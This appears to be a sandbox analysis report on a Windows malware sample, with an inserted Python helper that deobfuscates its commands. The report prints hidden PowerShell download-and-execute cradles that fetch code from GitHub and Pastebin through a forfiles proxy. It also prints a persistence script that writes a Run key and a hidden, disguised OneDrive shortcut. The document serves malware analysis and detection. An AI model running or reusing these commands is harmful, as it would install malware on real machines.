Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF7B.tmp" "c:\Users\user\AppData\Local\Temp\ztufso2n\CSC92EFC5D82192472686D16339634A9CDA.TMP"
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7676 -s 1932
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: unknown | Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: unknown | Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
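The string chunks in the "Command line argument" rows and the forfiles/Set-Alias cradle in the process rows above can be normalised mechanically rather than read by eye. The following Python is an added example written for this page; it is not Joe Sandbox's code and not the sample's. Its inputs are the report rows copied verbatim (constructed input for the example), it assumes `$env:OS` expands to `Windows_NT` (its value on any Windows host), and the two-entry LOLBin list is illustrative, not a complete catalogue.

```python
"""Triage helpers for the rows above: reassemble the chunked string constants,
resolve the Set-Alias ('sal') obfuscation in the forfiles cradle, and flag the
LOLBin-proxied PowerShell chain.  Added example; not Joe Sandbox or sample code."""
import re
from collections import defaultdict

# Rows copied from the report above (constructed input). The sandbox renders each
# row as 'Source: <process><event>: <value>' with the function id fused on the end.
CHUNK_ROWS = [
    "Source: C:\\Users\\user\\Desktop\\Lm9IJ4r9oO.exeCommand line argument: htt0_2_006725F0",
    "Source: C:\\Users\\user\\Desktop\\Lm9IJ4r9oO.exeCommand line argument: ps://raw.githu0_2_006725F0",
    "Source: C:\\Users\\user\\Desktop\\Lm9IJ4r9oO.exeCommand line argument: busercontent.c0_2_006725F0",
    "Source: C:\\Users\\user\\Desktop\\Lm9IJ4r9oO.exeCommand line argument: om/labail300/ps0_2_006725F0",
    "Source: C:\\Users\\user\\Desktop\\Lm9IJ4r9oO.exeCommand line argument: >-i0_2_00692C90",
]
CRADLE = ("sal fatbake calc;sal callit iEx; sal $env:os iWr; "
          "calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)")
PROCESS_ROWS = [
    "Source: unknownProcess created: C:\\Windows\\System32\\forfiles.exe "
    "\"C:\\Windows\\System32\\forfiles.exe\" /p c:\\windows\\system32 /m notepad.exe "
    "/c \"powershell.exe -command powershell -windowstyle h -command '" + CRADLE + "'\"",
    "Source: C:\\Windows\\System32\\forfiles.exeProcess created: "
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "-command powershell -windowstyle h -command '" + CRADLE + "'",
]

CHUNK_RE = re.compile(r"^Source: (.+?)Command line argument: (.*?)(\d+_\d+_[0-9A-Fa-f]{8})$")
PROC_RE = re.compile(r"^Source: (.+?)Process created: (\S+)\s*(.*)$")
ALIAS_RE = re.compile(r"^(?:sal|set-alias)\s+(\S+)\s+(\S+)$", re.IGNORECASE)
SCRIPT_RE = re.compile(r"""-command\s+['"]([^'"]+)['"]""", re.IGNORECASE)
CANON = {"iex": "Invoke-Expression", "iwr": "Invoke-WebRequest"}  # built-in aliases
PROXY_BINARIES = {"forfiles.exe", "pcalua.exe"}  # illustrative LOLBin list (assumption)


def reassemble_chunks(rows):
    """Concatenate string constants that share a function id, in report order.
    Splitting a URL into 'htt' + 'ps://raw.githu' + ... defeats a naive strings scan."""
    parts = defaultdict(list)
    for row in rows:
        m = CHUNK_RE.match(row)
        if m:
            parts[m.group(3)].append(m.group(2))
    return {func: "".join(chunks) for func, chunks in parts.items()}


def resolve_aliases(script, env_os="Windows_NT"):
    """Expand 'sal <name> <target>' definitions in a one-liner and list aliases that
    are defined but never called (decoys). $env:OS is 'Windows_NT' on every Windows
    host, which is how the sample names an alias it later calls as WINDOWS_NT."""
    aliases, body = {}, []
    for stmt in (s.strip() for s in script.split(";")):
        m = ALIAS_RE.match(stmt)
        if m:
            name, target = m.groups()
            if name.lower() == "$env:os":
                name = env_os
            aliases[name.lower()] = CANON.get(target.lower(), target)
        elif stmt:
            body.append(stmt)
    text, used = "; ".join(body), set()
    for name, target in aliases.items():
        pattern = re.compile(r"\b" + re.escape(name) + r"\b", re.IGNORECASE)
        if pattern.search(text):
            used.add(name)
            text = pattern.sub(target, text)
    return text, sorted(set(aliases) - used)


def triage_process_rows(rows):
    """Return (parent, child, finding) per row. A finding is raised when a LOLBin
    proxies PowerShell or when the child's script, once de-aliased, is a
    download-and-execute cradle."""
    findings = []
    for row in rows:
        m = PROC_RE.match(row)
        if not m:
            continue
        parent, child, cmdline = m.groups()
        pbase = parent.rsplit("\\", 1)[-1].lower()
        cbase = child.rsplit("\\", 1)[-1].lower()
        notes = []
        if pbase in PROXY_BINARIES and cbase == "powershell.exe":
            notes.append("LOLBin proxy execution")
        s = SCRIPT_RE.search(cmdline)
        if s:
            plain, _ = resolve_aliases(s.group(1))
            if "Invoke-Expression" in plain and "Invoke-WebRequest" in plain:
                notes.append("download-and-execute cradle")
        findings.append((pbase, cbase, "; ".join(notes) or None))
    return findings


if __name__ == "__main__":
    for func, const in reassemble_chunks(CHUNK_ROWS).items():
        print(f"{func}: {const}")
    plain, decoys = resolve_aliases(CRADLE)
    print(f"de-aliased: {plain}  (decoy aliases: {decoys})")
    for parent, child, note in triage_process_rows(PROCESS_ROWS):
        print(f"{parent} -> {child}: {note}")
```

De-aliasing turns the quoted script into Invoke-Expression(Invoke-WebRequest pastebin.com/raw/sA04Mwk2 -usebasicparsing) and leaves fatbake (an alias for calc) over as a decoy that is defined but never called. The reassembled constant for function 0_2_006725F0 begins https://raw.githubusercontent.com/labail300/ps, a different repository path from the Neth3N URL that the runtime command line actually fetches, so both are worth recording as indicators.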
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe | Section loaded: apphelp.dll, wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, iphlpapi.dll, mswsock.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, virtdisk.dll, fltlib.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, iphlpapi.dll, dnsapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, version.dll, kernel.appcore.dll, mscoree.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, kernel.appcore.dll
Source: C:\Windows\SysWOW64\attrib.exe | Section loaded: ulib.dll, fsutilext.dll
Source: C:\Windows\System32\forfiles.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, iphlpapi.dll, dnsapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll
Source: C:\Windows\System32\forfiles.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: BeginSync.lnk.4.drLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: Lm9IJ4r9oO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Lm9IJ4r9oO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Lm9IJ4r9oO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Lm9IJ4r9oO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Lm9IJ4r9oO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Lm9IJ4r9oO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Lm9IJ4r9oO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: Automation.pdb source: powershell.exe, 00000004.00000002.1820569925.00000000073A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000018.00000002.2227640712.000001D0F6650000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Programming1\ConsoleApplication2\Release\ConsoleApplication2.pdb source: Lm9IJ4r9oO.exe
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000004.00000002.1836250015.0000000008455000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbO source: powershell.exe, 00000018.00000002.2227640712.000001D0F677B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ib.pdb source: powershell.exe, 00000018.00000002.2227640712.000001D0F66A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1836250015.0000000008455000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2227640712.000001D0F673E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000004.00000002.1820569925.000000000739F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2227640712.000001D0F6650000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 5c561934e089\mscorlib.pdb source: powershell.exe, 00000018.00000002.2227640712.000001D0F677B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbg source: powershell.exe, 00000018.00000002.2227640712.000001D0F66A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: e089\mscorlib.pdbHo source: powershell.exe, 00000018.00000002.2227640712.000001D0F677B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Commands.Utility.pdb4e089` source: powershell.exe, 00000004.00000002.1835795117.00000000083B0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Managem..Automation.pdb source: powershell.exe, 00000004.00000002.1820569925.00000000073A1000.00000004.00000020.00020000.00000000.sdmp
Source: Lm9IJ4r9oO.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Lm9IJ4r9oO.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Lm9IJ4r9oO.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Lm9IJ4r9oO.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Lm9IJ4r9oO.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)'
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline"
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe | Code function: 0_2_00678797 push ecx; ret 0_2_006787AA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_07FBBFF8 push eax; mov dword ptr [esp], edx 4_2_07FBC124
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_08131980 push es; ret 4_2_08131996
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_08138A90 push es; ret 4_2_08138AA2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_08137548 push eax; mov dword ptr [esp], edx 4_2_0813755C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_081BD518 pushfd ; retf 4_2_081BD575
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_08200B32 push esp; ret 4_2_08200B35
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_08207B5C push FFFFFF8Bh; iretd 4_2_08207B75
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_08208BE7 push eax; mov dword ptr [esp], edx 4_2_08208BFC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_08201298 push 84080FCFh; iretd 4_2_082012A1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_08281858 pushad ; iretd 4_2_08281859
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_08289D58 push FFFFFF8Bh; retf 4_2_08289D5A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_0828D200 push eax; mov dword ptr [esp], edx 4_2_0828D214
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_08283617 push ebx; iretd 4_2_082836DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_08330848 push eax; mov dword ptr [esp], edx 4_2_08330944
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_083305C0 push eax; mov dword ptr [esp], edx 4_2_083305D4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_0834D8D0 push es; ret 4_2_0834D8E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 18_2_00007FFB10FB8978 push E8FFFFFEh; iretd 18_2_00007FFB10FB897D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 18_2_00007FFB10FB5449 push ebp; iretd 18_2_00007FFB10FB55E8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 18_2_00007FFB10FB5B7C push cs; retf 18_2_00007FFB10FB5B7F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 18_2_00007FFB111155D7 push esi; iretd 18_2_00007FFB111155E7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 18_2_00007FFB1111D626 push es; retf 18_2_00007FFB1111D64F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 18_2_00007FFB113CF9B6 pushad ; ret 18_2_00007FFB113CF9F4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 18_2_00007FFB114D80FC push ebx; ret 18_2_00007FFB114D813A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 18_2_00007FFB114DA18C pushad ; ret 18_2_00007FFB114DA184
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 18_2_00007FFB114DA150 pushad ; ret 18_2_00007FFB114DA184
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 18_2_00007FFB114D4AE0 pushad ; ret 18_2_00007FFB114D4AF4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 18_2_00007FFB11756ECA push edx; ret 18_2_00007FFB11756ECB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.dll

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,
